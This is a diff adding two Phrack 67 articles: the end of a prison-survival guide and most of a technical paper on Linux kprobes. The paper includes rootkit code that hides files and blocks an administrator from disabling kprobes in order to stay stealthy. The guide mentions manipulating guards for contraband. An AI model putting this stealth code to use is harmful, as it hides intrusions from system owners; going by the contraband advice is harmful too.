+   6. Commissary costs more.
+
+                                County pros
+
+   1. You may get to see females and depending on the jail write them 
+      (they'll be locked up too).
+   2. You may get to have your own shower.
+   3. You may not have to get up if you don't want to.
+   4. You may not have a lights out time.
+   5. Not every thing is gang related like prison and you can basically 
+      chill with who ever you want (as far as race goes rivalries still 
+      hold up).
+
+                            -------------------
+
+                                Prisons cons
+
+   1. A lot of new rules you must learn and you might be expected to learn 
+      without any help.
+   2. The daily schedule will be a lot different than in county.
+   3. Gang wars.
+   4. Lock downs (no movement at all until told otherwise this can go on 
+      for months).
+   5. Work (you will have to work and you may not get paid for it... You 
+      could work in the fields too and that sucks).
+   6. Can't wright other people who are also locked up (this means the girl 
+      you wrote in county wont be getting your letter).
+   7. Mass butt naked searches. 
+   8. Take showers in front of every one.
+
+                                Prisons pros
+
+   1. Time goes by a lot faster in county jail
+   2. Easy to make money.
+   3. Tattooing is more available.
+   4. Cheaper commissary.
+   5. Easier access to tobacco/drugs.
+   6. A lot more respect than what there is in jail.
+
+
+                            -------------------
+
+
+--[ 8 - Common situations
+
+
+Here we will talk about a few common (negative) situations presented to the
+newer people of the prison world. In this section I'm going to tell you the
+best ways to get out of them and I'll try to explain them in a way you can 
+understand. Not all situations are listed in this section because no one 
+can list them all but you can use what is here to help you 'free style' the
+situation if one arises. Like I've said before you can use social 
+engineering skills to help you get what you want or get out of almost 
+anything that you can get yourself into. So lets get to it...
+
+1. It's your first day on the unit (prison), people will be looking to see 
+if they can make you there punk/bitch (remember that we've talked about 
+this before). The most common way they will try this is using intimidation.
+Most of the time a group of inmates will approach you and ask you seemingly
+harmless questions but they're not. These questions can be used against 
+you in some type of way (these people are not trying to be friendly, it may
+seem this way but it's not). Few subjects you should not release any 
+information about would be: 
+
+  - Your family/personal life. Do not give your address or anything such as
+    this out. The reason for this is to make it harder for them to know the
+    people you may know.
+
+  - Never lie about things you're not sure of. Just simply state that it's 
+    your business and keep it as such. Also do not lie to try and gain 
+    acceptance because it will not work. Keep your stories to yourself and 
+    only tell them to trusted people.
+
+2. You walk into the 'dayroom' (the place where everyone gathers to play 
+games/watch tv/converse) and you see the people who entered your cell 
+earlier playing a game of cards. You see that they are having a good amount
+of fun and you need something to help take your mind off of your situation
+or you just simply want to go over and make a few new friends. Well I'd 
+recommend that you stay to yourself for a while longer and let the other 
+inmates invite you to the game if they choose to do so. Still be cautious 
+if they do as they might try to manipulate you for some reason.
+
+Note: I'd also recommend that you do not just go up to people asking them 
+questions or telling them your adventures from the free world. Being a 
+friendly person is not looked at as a good thing while in prison.
+
+The reason you should not just walk up to people and talk to them is
+because some of them are mentally ill and may attack you if you attempt 
+this. They will also try to make you think they are your friend and use you
+for their amusement or personal gain. You should also never give out 
+personal information to people you don't know because they may use that to 
+help find victims when they are released. 
+
+Note: If you want to make friends then my advice is to not lie to people 
+show them you're trustworthy. If you're not a drug dealer then don't say 
+you are. If you've never shot a gun don't say you have. And also don't 
+overload them with technical talk, and don't get all excited to be talking 
+to someone. They are not that cool plus it's annoying.
+
+3. Someone disrespects you, either verbally or physically (pushing you or 
+bumping into you). When this happens your safest bet would be to fight and 
+not let this go on for very long because you will be seen as a bitch. Now 
+if you are challenged to a fight then you should accept it and fight as 
+good as you can. It won't really matter if you win or lose. If the inmates 
+see you will fight then they will respect you.
+
+Note: If a guard tells you to stop or hit the floor then you should do so 
+to avoid being pepper sprayed or tazed. Some prisons are allowed to use 
+deadly force.
+
+4. Your friends or some other people ask you to join a gang. This is up to 
+you. For help refer back to the gang section of the article.
+
+5. You see something happening that you don't like, then your best response 
+would be no response. If you get into someone else's business then it will 
+only cause problems on yourself and you do not need any problems that can 
+be avoided. If you choose to take action then that will be on you, I have 
+warned you of doing so.
+
+Note: This could result in retaliation from other inmates as well.
+
+6. You're about to get out and you no longer want to be in the gang you 
+joined when you first got locked up. Well there's a problem with this 
+because one you were told it was for life and two they will most likely put
+a contract on you (hire someone to kill you). To avoid being killed inside 
+the prison walls you can use a technique. In prison they have a program 
+called 'PC' (protective custody) this is for people with mental/physical 
+illnesses and for the weaker prisoners. You will use this to your 
+advantage, here is a good way to put yourself on PC:
+ 
+Contact a ranking guard and let him know your situation. You will want to 
+do this with a guard you trust so that he will not tell everyone of what 
+you are planning to do. Sooner or later you will be taken to a one man cell
+and you will be asked questions by the gang task force. You will be asked 
+to give any and all information about the gang and if you don't help them 
+then they will not help you.
+
+Note 1: In my opinion if you use this part of the file you do not deserve 
+to call yourself a man.
+
+Note 2: These are the most common situations you may go through in prison 
+but these are not definite. You may need to customize these techniques or 
+apply them to different situations...
+
+
+-[ 9 - Staying mentally Fit
+
+
+In this part of the text we will be talking about the various techniques to
+help you stay mentally fit. Basically what I'm talking about is how not to 
+go crazy. Some people have the tendencies to over obsess about the outside 
+world, or to think too much about their friends and family. This will cause
+you to stress yourself out and become depressed. This leads to suicide in 
+some people and this is what we want to avoid. So here are a few techniques
+or suggestions that I'll give you to help keep you on top of things.
+
+1. Some people put all their faith in getting letters and phone calls from 
+their family/friends. This is not really a good thing. When you get a 
+letter I would recommend reading it once and then replying to the letter as
+soon as possible. Doing this will help you keep your mind off the free 
+world. If you continually keep negative things on your mind/think about 
+negative things then your attitude will almost always be negative. This is 
+what we want to avoid inside the prison walls. The more negative you are or
+negativity that your around will likely cause you to do negative things.
+This will most likely cause you to stay inside prison longer then you have 
+to.
+
+2. Visitation is most likely going to be the hardest part to get out of 
+your mind. The reason for this is because you actually get to be with the 
+people you love. Now depending on where you are at, you may have be 
+separated by a wall with glass and will talk to them on a pay-phone type 
+set-up. 
+
+Note: Beware that most prisons record these types of conversations. You may
+not get a prompt letting you know this but regardless be careful on what 
+you say. A few tips on how to have a good visit from the family/friends: 
+
+- Stay on a positive topic. You don't need to fight or argue with someone 
+who takes the time to come and see you, and later on you'll most likely 
+feel bad for doing this. This is what we don't want.
+
+- Do not attempt to get your visitor to smuggle contraband. This can cause 
+problems between you and the visitor, or you may end up getting them put in
+prison if they do wish to bring the contraband.
+
+- Take one visitation at a time. In other words do not go back to your cell
+and ponder upon the visit. Doing so will cause you more stress and problems
+than you should have to deal with.
+
+3. You will be allowed to have pictures of your loved ones. This can be a 
+good thing. Everyone wants to have pictures, but you should not keep them 
+out because this causes you to pay more attention to the pictures instead 
+of the things you really should be doing. You're just making your time 
+harder then it should be by thinking about things that make you depressed.
+
+Note: Also keeping your personal stuff out can end up getting it stolen by 
+the other inmates. Stealing is frowned upon but is every common inside 
+prisons.
+
+4. When the guards tell you 'lights out' or bed time then this is what you 
+should do. Do not stay up at night and ponder upon your misfortunes or your
+family. The reason is this causes you to lose sleep and will make your 
+daily schedule very hard to work with. You may be expected to work while 
+you're locked up and if you're not fully functional then you will cause the
+others to get angry and lash out against you.
+
+5. Try to have as much fun as you can. This is hard but you have to try. 
+Once you get comfortable and in transition to this new way of life then it 
+will become easier. The main thing you should do to have fun is play games 
+such as cards, dominoes. They may have a few board games also (I liked to 
+play a good game of chess myself). Also when you're at the rec. yard (a 
+place outside where you are allowed to Rome inside a certain area) play 
+some sports like basket ball or football. There will be sports and people 
+willing to play, this can also help you meet new people who can help 
+distract you from your daily problems.
+
+6. Like I mentioned earlier you can workout to keep you in shape and keep 
+your mind off your problems. Find you a good workout routine and stick with
+it. Working out is proved to higher your self-esteem and help with 
+depression. You don't always have to wait until you go outside to workout, 
+you can do this inside your cell whenever you find yourself thinking about 
+negative things.
+
+7. Establishing a relationship with a guard (depending on the sex the 
+reader is) can also help you pass the time. If you have someone that is 
+willing to help you in your time of need then this will bring your stress 
+level to a lower term if not take it away completely.
+
+Note: Establishing a relationship with a guard is not easy. They look at 
+you like a criminal so your goal is to either manipulate them into 
+believing that you're not or just simply show them the real you {nice, 
+kindly person lol}. Like I've said this is a hard task but this in itself 
+can keep your mind off the bullshit. Think of new ways to get through the 
+guards personal defenses (you're hackers you should be good at this), and 
+when you finally overcome them then you have all kinds of fun things to do 
+depending on what your intentions are (contraband staff, or true 
+relationship. Yes you may be able to fuck them). 
+
+
+-[ 10 - Why I Wrote This
+
+
+I wrote this article based on the assumption that many people would 
+basically enjoy it, but also that it may help some people if they happen 
+to go to prison. I was sentenced to 20 years for aggravated assault with a 
+deadly weapon. It was my first time ever being locked up but I was one of 
+the ones who took it as a challenge. While inside I've seen other first 
+timers being treated in a way that no person should ever be treated. 
+
+I made it inside the prison walls and now I am sharing with you ways for 
+you to make it also, use this to your advantage this is for entertainment 
+but also education.
+
+
+                                          -TAp
+
+
+PS: If you have any questions you would like for me to answer then please 
+feel free to contact me.
+
diff --git a/phrack67/6.txt b/phrack67/6.txt
new file mode 100644
index 0000000..5fdc71f
--- /dev/null
+++ b/phrack67/6.txt
@@ -0,0 +1,1778 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ by ElfMaster ]=---------------------------=|
+|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+1 - Introduction
+	1.1 - Why write it?
+	1.2 - About kprobes
+	1.3 - Jprobe example
+	1.4 - Kretprobe example & Return probe patching technique
+
+2 - Kprobes implementation
+	2.1 - Kprobe implementation
+	2.2 - Jprobe implementation
+	2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
+	2.4 - Kretprobe implementation
+	2.5 - A quick stop into modifying read-only kernel segments
+	2.6 - An idea for a kretprobe implementation for hackers
+
+3 - Patch to unpatch W^X (mprotect/mmap restrictions)
+
+4 - Notes on rootkit detection for kprobes
+
+5 - Summing it all up.
+
+6 - Greetz
+
+7 - References and citations
+
+8 - Code
+
+
+
+---[ 1 - Introduction
+
+----[ 1.1 - Why write it?
+
+I will preface this by saying that kprobes can be used for anti-security
+patching of the kernel. I would also like to point out that kprobes are not
+the most efficient way to patch the kernel or write rootkits and backdoors
+because they simply require more work -- extra innovation. 
+So why write this? Because... we are hackers. Hackers should be aware of
+any and all resources available to them -- some more auspicious than
+others -- Nonetheless, kprobes are a sweet deal when you consider that they
+are a native kernel API that are ripe for abuse, even without exceeding
+their scope. Due to limitations discussed later on, kprobes require some
+extra innovation when determining how to perform certain tasks such as file
+hiding and applying other interesting patches that could subvert or even
+harden the kernels integrity.
+
+
+----[ 1.2 - About kprobes
+
+It is with no doubt that the best introduction to kprobes is in the Linux 
+kernel source documentation that contains kprobes.txt. Make sure to read
+that when you get a chance. Kprobes are a debugging API native to the Linux
+kernel that is based on the processors debug registers -- whatever the 
+processor may be. We are going to assume x86, which at this time has the
+most kprobe code developed.
+
+--From kprobes.txt --
+
+Kprobes enables you to dynamically break into any kernel routine and
+collect debugging and performance information non-disruptively. You
+can trap at almost any kernel code address, specifying a handler
+routine to be invoked when the breakpoint is hit.
+
+There are currently three types of probes: kprobes, jprobes, and
+kretprobes (also called return probes).  A kprobe can be inserted
+on virtually any instruction in the kernel.  A jprobe is inserted at
+the entry to a kernel function, and provides convenient access to the
+function's arguments.  A return probe fires when a specified function
+returns.
+
+--
+
+Based on this definition one can imagine that this kprobes interface may be
+used to instrument the kernel in some useful ways, both for security and
+anti-security; That is what this paper is about. In the recent past I 	
+implemented some relatively powerful and complex security patches 
+using kprobes. That is not to say that other patching methods are
+not still useful, but occasionally one may run into issues using traditional
+methods such as kernel function trampolines which are not SMP safe due
+to the non-atomic nature of swapping code in and out. kprobes are a native 
+interface which is nice, but they still present some challenges due to
+limitations we discuss throughout the paper. Kprobes can be used to patch
+the kernel in some places, but cannot be used for everything. This a treatise
+that can shed some light on when and where kprobes can be used to modify
+the behavior of the kernel. Sometimes they must be used in conjunction with
+another patching method. Before we move on I wanted to point out the following
+few facts:
+
+kprobes show up as being registered here:
+
+/sys/kernel/debug/kprobes/list
+
+And can be enabled or disabled by writing a 0 or a 1 here:
+
+/sys/kernel/debug/kprobes/enabled
+
+The kprobe source code is located in the following locations:
+/usr/src/linux/kernel/kprobes.c
+/usr/src/linux/arch/x86/kernel/kprobes.c 
+
+Keep in mind that jprobes/kretprobes are 100% based on kprobes and
+disabling kprobes like shown above will prevent any kretprobe/jprobe
+code from working as well. 
+
+Moving on...
+
+
+----[ 1.3 - Jprobe example
+
+In this paper we will be working primarily with jprobes and kretprobes.
+As shown in the kprobe documentation already, there are several functions
+available for registering and unregistering these probes.
+
+Lets pretend for a moment that we are interested in sys_mprotect, and we want
+to inspect any calls to it, and the args that are being passed. For this
+we could register a jprobe for sys_mprotect. The following code outlines the
+general idea here. And consider that because we are setting a jprobe on 
+a syscall, we need to either declare our jprobe handler using 'asmlinkage'
+magic, otherwise we must get our args directly from the registers. In our
+example I will get the args directly from the registers just to show how
+to obtain the registers for the current task.
+
+-- jprobe example 1 --
+
+
+NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe
+implementation]
+
+int n_sys_mprotect(unsigned long start, size_t len, long prot)
+{
+	struct pt_regs *regs = task_pt_regs(current);
+	
+	start = regs->bx;
+	len = regs->cx;
+	prot = regs->dx;
+
+	printk("start: 0x%lx len: %u prot: 0x%lx\n", start, len, prot);
+	jprobe_return();
+	return 0;
+}           
+
+/*
+	The following entry in struct jprobe is 'void *entry'
+	and simply points to the jprobe function handler that will
+	be executing when the probe is hit on the function entry
+	point.
+*/
+
+static struct jprobe mprotect_jprobe = 
+{
+	.entry = (kprobe_opcode_t *)n_sys_mprotect  // function entry  
+};
+
+static int __init jprobe_init(void)
+{
+	/* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
+	/* points to the probe point where the trap will occur. In */
+	/* our case we are probing sys_mprotect */
+	mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
+	
+	if ((ret = register_jprobe(&mprotect_jprobe)) < 0)
+	{
+		printk("register_jprobe failed for sys_mprotect\n");
+		return -1;
+	}
+	
+	return 0;
+}
+
+
+int init_module(void)
+{
+	jprobe_init();
+	return 0;
+}
+
+void exit_module(void)
+{
+	unregister_jprobe(&mprotect_jprobe);
+}
+
+
+In the above code, we register a jprobe for sys_mprotect. This means that
+a breakpoint instruction is placed on the entry point of the function,
+and as soon as it gets called a trap occurs and control is passed to our
+n_sys_mprotect() jprobe handler. From this point we can analyze data such
+as the arguments passed either in registers or on the stack, as well as any
+kernel data structures. We can also modify kernel data structures, which 
+is primarily what we rely on for our patches using kprobes. Any attempts
+to modify the stack arguments or registers will be overriden as soon as
+our handler function returns -- this is because kprobes saves the register
+state and stack args prior to calling the handler, and restores these values
+upon the jprobe_return(), at which point the real syscall or function will
+execute and do its thing. We will get into much more detail on this topic
+and how to actually modify stack arguments later on. 
+
+
+----[ 1.4 - Kretprobe example and return probe patching technique
+
+Moving on to kretprobes (Also known as return probes). Without kretprobes it
+wouldn't be as easily possible to patch the kernel using kprobes, this is
+because a kernel function that we set a jprobe on might re-modify a
+kernel data structure that we modify, as soon as our jprobe handler returns.
+If we apply a kretprobe into the situation we can modify that kernel data
+structure after the real kernel function returns. Here is an example...
+Lets say we want to modify the kernel data structure 'kstruct->x' (which is 
+ficticious). We want to modify it, but do not know what value we want to 
+apply to it until 'function_A' executes, but as soon as the real 'function_A' 
+executes after our jprobe handler, it sets the value 'kstruct->x' to something. 
+This is where kretprobes come into play. This is the approach we take, which
+we can call the 'return probe patching' technique.
+
+	1. [jprobe handler for function_A]    -> Determines the value that we want to set on kstruct->x
+	2. [function_A] 		      -> Sets the value of kstruct->x to some value.
+	3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler.
+
+So as you can see, with kretprobes we end up being able to set the final 
+verdict on a value.
+
+Here is a quick example of registering a kretprobe. We will use sys_mprotect
+for this example as well.
+
+The kretprobe data types will be explained in the section 2.4 [kretprobes
+implementation].
+
+static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+	printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr);
+	return 0;
+
+
+}
+static struct kretprobe mprotect_kretprobe =
+{
+	.handler = mprotect_ret_handler, // return probe handler
+	.maxactive = NR_CPUS // max number of kretprobe instances
+};
+
+
+int init_module(void)
+{
+	mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
+	register_kretprobe(&mprotect_kretprobe);
+	
+}
+
+As you can see I utilize kallsyms_lookup_name(), but interestingly a probe
+can be set on virtually any instruction within the kernel, whatever means
+you use to get that location is up to you (I.E System.map).
+
+
+So as you can see, the code is straight forward. From an internal point
+of view-- by the time sys_mprotect returns, the address at the top of 
+the stack (the ret address) has been modified to point to a function 
+called kretprobe_trampoline() which in turn sets things up to call 
+our mprotect_ret_handler() function where we can inspect and modify 
+kernel data. No point in modifying the registers because they were 
+all saved on the stack and will be reset as soon as our handler returns. 
+More on this in the next section. The kretprobe trampoline function will be
+explored in detail in 2.4 [Kretprobe implementation].
+
+
+---[ 2 - Kprobes implementation
+
+----[ 2.1 - Kprobe implementation
+
+Firstly I want to make sure we are on the same page about what a basic
+kprobe is, and the general idea of how it works.
+
+-- Taken from kprobes.txt:
+
+When a kprobe is registered, Kprobes makes a copy of the probed
+instruction and replaces the first byte(s) of the probed instruction
+with a breakpoint instruction (e.g., int3 on i386 and x86_64).
+
+When a CPU hits the breakpoint instruction, a trap occurs, the CPU's
+registers are saved, and control passes to Kprobes via the
+notifier_call_chain mechanism.
+Kprobes executes the "pre_handler" associated with the kprobe, passing 
+the handler the addresses of the kprobe struct and the saved registers.
+It would be simpler to single-step the actual instruction in place,
+but then Kprobes would have to temporarily remove the breakpoint
+instruction. This would open a small time window when another CPU
+could sail right past the probepoint.
+
+After the instruction is single-stepped, Kprobes executes the
+"post_handler," if any, that is associated with the kprobe.
+Execution then continues with the instruction following the probepoint.
+Next, Kprobes single-steps its copy of the probed instruction.
+
+--
+
+So to clarify, when registering a typical kprobe a pre_handler should
+always be assigned so that you can inspect data or do whatever you want
+during that point. A post handler may or may not be assigned.
+
+Since we are primarily using jprobes and kretprobes which are extensions
+of the kprobe interface, I have chosen to primarily discuss their implementation
+more so than a plain kprobe. All you need to know for now is that registering
+a basic kprobe inserts a breakpoint instruction on the desired location, and
+executes a pre and a post handler that you assign. As you will see in the jprobe and
+kretprobe implementations which are implemented using a basic kprobe with
+a pre and post handler, the pre and post handlers point to special kernel
+functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of
+prologue/epilogue for the actual handler that executes the instructions.
+More will be revealed in the following sections.
+
+
+----[ 2.2 - Jprobe implementation
+
+If we are aware of the internal implementation of jprobes and kretprobes
+then we can utilize them better, and we could even patch the interface
+itself to act more like we want it, but this defeats the purpose of this
+paper which aims at patching the kernel using the kprobes interface as it
+is, although we will explore some external modifications of kprobes later
+on.
+
+Firstly take a look at the following struct:
+
+struct jprobe {
+        struct kprobe kp;
+        void *entry;    /* probe handling code to jump to */
+};
+
+When we call register_jprobe() it in turn calls register_jprobes(&jp, 1).
+register_jprobes() is all about setting up the jprobe pre/post and entry
+handler.
+
+-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --
+
+		/* See how jprobes utilizes kprobes? It uses the */
+		/* pre/post handler */
+  		jp->kp.pre_handler = setjmp_pre_handler;     
+                jp->kp.break_handler = longjmp_break_handler;
+                ret = register_kprobe(&jp->kp);
+--
+
+The pre_handler is called before your function/entry handler and is responsible
+for saving the contents of the stack, the registers, and sets the eip. In
+normal circumstances the developer has no control over the pre/post
+handler for jprobes because the kprobe pre and post handler entries within
+struct kprobe do not point to your own custom handlers, but instead to
+specialized handlers specifically for the jprobe prologue/epilogue.
+
+        /* Called before addr is executed. */
+        kprobe_pre_handler_t pre_handler;
+
+        /* Called after addr is executed, unless... */
+        kprobe_post_handler_t post_handler;
+
+You could say that the execution of a jprobe looks like this:
+
+	1. [jprobe pre_handler] Backup stack and register state
+	2. [jprobe function handler] Do elite modifications to kernel
+	3. [jprobe post_handler] Restore original stack and registers.
+
+Lets take a peek at the pre_handler which backs up the stack and registers.
+
+int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
+{
+        struct jprobe *jp = container_of(p, struct jprobe, kp);
+        unsigned long addr;
+        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
+
+        kcb->jprobe_saved_regs = *regs;
+        kcb->jprobe_saved_sp = stack_addr(regs);
+        addr = (unsigned long)(kcb->jprobe_saved_sp);
+
+        /*
+         * As Linus pointed out, gcc assumes that the callee
+         * owns the argument space and could overwrite it, e.g.
+         * tailcall optimization. So, to be absolutely safe
+         * we also save and restore enough stack bytes to cover
+         * the argument area.
+         */
+        memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
+               MIN_STACK_SIZE(addr));
+        regs->flags &= ~X86_EFLAGS_IF;
+        trace_hardirqs_off();
+        regs->ip = (unsigned long)(jp->entry);
+        return 1;
+}
+
+Pay close attention to the code comment above; Like with Chuck Noris... if Linus
+says it, then it MUST be true! 
+
+As you can see, the function gets the current stack location using the stack_addr()
+macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the
+stack to be restored in the post handler. The stack being restored prior to the
+real function being called does impose some obvious restrictions, but that does
+not mean that we can't manipulate the pointer values that are passed on the stack
+which is something we take advantage of in section 2.3 (File hiding). After
+the jprobe handler is finished, the jprobe post handler is called -- here
+is the code.
+
+int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
+{
+        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
+        u8 *addr = (u8 *) (regs->ip - 1);
+        struct jprobe *jp = container_of(p, struct jprobe, kp);
+
+        if ((addr > (u8 *) jprobe_return) &&
+            (addr < (u8 *) jprobe_return_end)) {
+                if (stack_addr(regs) != kcb->jprobe_saved_sp) {
+                        struct pt_regs *saved_regs =
+&kcb->jprobe_saved_regs;
+                        printk(KERN_ERR
+                         "current sp %p does not match saved sp %p\n",
+                               stack_addr(regs), kcb->jprobe_saved_sp);
+                        printk(KERN_ERR "Saved registers for 
+jprobe %p\n", jp);
+                        show_registers(saved_regs);
+                        printk(KERN_ERR "Current registers\n");
+                        show_registers(regs);
+                        BUG();
+                }
+                *regs = kcb->jprobe_saved_regs;
+                memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
+                       kcb->jprobes_stack,
+                       MIN_STACK_SIZE(kcb->jprobe_saved_sp));
+                preempt_enable_no_resched();
+                return 1;
+        }
+        return 0;
+}
+
+
+The code primarily restores the stack and re-enables preemption; probe 
+handlers are run with preemption disabled.
+
+
+----[ 2.3 - File hiding using jprobes/kretprobes
+
+Lets consider a simple file hiding approach that consists using the 
+dirent->d_name pointer in filldir64(). 
+
+
+char *hidden_files[] = 
+{
+#define HIDDEN_FILES_MAX 3
+	"test1",
+	"test2",
+	"test3"
+};
+
+struct getdents_callback64 {
+        struct linux_dirent64 __user * current_dir;
+        struct linux_dirent64 __user * previous;
+        int count;
+        int error;
+};
+
+/* Global data for kretprobe to act on */
+static struct global_dentry_info
+{
+        unsigned long d_name_ptr;
+        int bypass;
+} g_dentry;
+
+/* Our jprobe handler that globally saves the pointer value of dirent->d_name */
+/* so that our kretprobe can modify that location */
+static int j_filldir64(void * __buf, const char * name, int namlen, loff_t 
+offset, u64 ino, unsigned int d_type)
+{
+        
+        int found_hidden_file, i;
+        struct linux_dirent64 __user *dirent;
+        struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf;
+        dirent = buf->current_dir;
+        int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);
+        
+        /* Initialize custom stuff */
+        g_dentry.bypass = 0;
+        found_hidden_file = 0;
+        
+        for (i = 0; i < HIDDEN_FILES_MAX; i++)
+                if (strcmp(hidden_files[i], name) == 0)
+                        found_hidden_file++;
+        if (!found_hidden_file)
+                goto end;
+        
+        /* Create pointer to where we need to modify in dirent */
+        /* since someone is trying to view a file we want hidden */
+        g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
+        g_dentry.bypass++; // note that we want to bypass viewing this file
+        
+        end:
+ 	jprobe_return();
+        return 0;
+}
+
+/* Our kretprobe handler, which we use to nullify the filename */
+/* Remember the 'return probe technique'? Well this is it. */
+static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+        char *ptr, null = 0;
+        /* Someone is looking at one of our hidden files */
+        if (g_dentry.bypass)
+        {
+                /* Lets nullify the filename so it simply is invisible */
+                ptr = (char *)g_dentry.d_name_ptr;
+                copy_to_user((char *)ptr, &null, sizeof(char));
+        }
+}
+
+
+The code above is quite adept at hiding files based on getdents64 being called	
+but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found,
+and if some of the d_names start with a null byte then we will see an error returned
+by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then
+we will see that error message 3 times prior to the directory listing (which will not
+show the hidden files). One of the primary limitations of kprobe patching
+is that we cannot modify the return value of a function; the closest we can get is
+setting up a return probe to modify data that the function may have operated on. 
+There are some indirect methods of altering the return value at times, but after
+following the code path for lstat64 I found no way to remedy the issue using kprobes.
+Instead I found the not-so-elegant approach of redirecting the stderr to /dev/null
+by setting a jprobe and a return probe on sys_write. Additionally, while modifying
+sys_write, we might as well redirect any attempts to disable kprobes to /dev/null
+as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to
+disable the kprobes interface (We don't want this). One of the parameters we will 
+pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry. 
+Below is the code for our modified sys_write.
+
+asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
+{
+        char *s = (char *)buf;
+        char null = '\0';
+        char devnull[] = "/dev/null";
+        struct file *file;
+        struct dentry *dentry = NULL;
+        unsigned int ino;
+        int ret;
+ 	char comm[255];
+	
+        stream_redirect = 0; // do we redirect to /dev/null?
+ 
+	/* Make sure this is an ls program */
+	/* otherwise we'd prevent other programs */
+	/* From being able to send 'cannot access' */
+	/* in their stderr stream, possibly */       
+	get_task_comm(comm, current);
+	if (strcmp(comm, "ls") != 0)
+		goto out;
+
+        /* check to see if this is an ls stat complaint, or ls -l weirdness */
+	/* There are two separate calls to sys_write hence two strstr checks */
+        if (strstr(s, "cannot access") || strstr(s, "ls:"))  
+        {
+                printk("Going to redirect\n");
+                goto redirect;  
+        }
+        /* Check to see if they are trying to disable kprobes */
+        /* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */
+        file = fget(fd);
+        if (!file)
+                goto out;
+        dentry = dget(file->f_dentry);
+        if (!dentry)
+                goto out;
+        ino = dentry->d_inode->i_ino;
+        dput(dentry);
+        fput(file);
+        if (ino != enabled_ino)
+                goto out; 
+        
+        redirect:
+        /* If we made it here, then we are doing a redirect to /dev/null */
+        stream_redirect++;
+        mm_segment_t o_fs = get_fs();
+        set_fs(KERNEL_DS);
+
+        n_sys_close(fd);
+        fd = n_sys_open(devnull, O_RDWR, 0);
+        
+        set_fs(o_fs);
+        global_fd = fd;
+
+	out:
+	jprobe_return();
+	return 0;
+}
+/* Here is the return handler to close the fd to /dev/null. */
+static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+        if (stream_redirect)
+        {
+                n_sys_close(global_fd);
+                stream_redirect = 0;
+        }
+        return 0;
+}
+
+We close the existing file descriptor and open a new one that will
+use the same fd number. This redirection of stderr to /dev/null is only for the
+current process. To understand it a bit more we can follow the code path of
+do_sys_open(), I've added some extra comments:
+ 
+long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
+{
+        char *tmp = getname(filename);
+        int fd = PTR_ERR(tmp);
+
+        if (!IS_ERR(tmp)) {
+                fd = get_unused_fd_flags(flags);
+                if (fd >= 0) {
+                        struct file *f = do_filp_open(dfd, tmp, flags,
+			mode, 0);
+                        if (IS_ERR(f)) {
+                                put_unused_fd(fd);
+                                fd = PTR_ERR(f);
+                        } else {
+
+				/* Notice fsnotify_open() */
+                                fsnotify_open(f->f_path.dentry); 
+				
+				/* Associate fd with /dev/null */
+                                fd_install(fd, f);
+                                trace_do_sys_open(tmp, flags, mode);
+                        }
+                }
+                putname(tmp);
+        }
+        return fd;
+}
+
+The new file descriptor is associated with its new file (struct
+files_struct *) for the current task using fd_install().
+
+void fd_install(unsigned int fd, struct file *file)
+{
+        struct files_struct *files = current->files; // <--  notice here
+        struct fdtable *fdt;
+        spin_lock(&files->file_lock);
+        fdt = files_fdtable(files);     // <-- notice here
+        BUG_ON(fdt->fd[fd] != NULL);
+        rcu_assign_pointer(fdt->fd[fd], file);   // <-- notice here
+        spin_unlock(&files->file_lock);
+}
+
+
+One important note to the reader is, /sys/kernel/debug/kprobes/list
+the file which shows any registered kprobes. Simply use a redirect
+technique like the one we used above to track open's to that file and
+redirect any writes to stdout to /dev/null if the list contains a 
+probe that you have registered. Very trivial, and absolutely necessary
+to maintain a stealth presence.
+
+As the topic of rootkits has become trite ...
+I would like to introduce some other kprobe examples. Firstly 
+let us discuss the Kretprobe implementation in detail. It will
+give some more insight into the limitations of kprobes and also
+expand your mind on how the kprobe implementation may be modified --
+which is not covered in this paper.
+
+
+----[ 2.4 - Kretprobe implementation
+
+The kretprobe implementation is especially interesting. Primarily because
+it is an innovative and nicely engineered chunk of code. Here is how it
+works. 
+
+-- From the kprobes.txt --
+
+When you call register_kretprobe(), Kprobes establishes a kprobe at
+the entry to the function.  When the probed function is called and this
+probe is hit, Kprobes saves a copy of the return address, and replaces
+the return address with the address of a "trampoline."  The trampoline
+is an arbitrary piece of code -- typically just a nop instruction.
+At boot time, Kprobes registers a kprobe at the trampoline.
+
+The kretprobe implementation is really just a creative way of using
+kprobes by registering them and assigning the trap handlers functions
+that deal with modifying the return address.
+
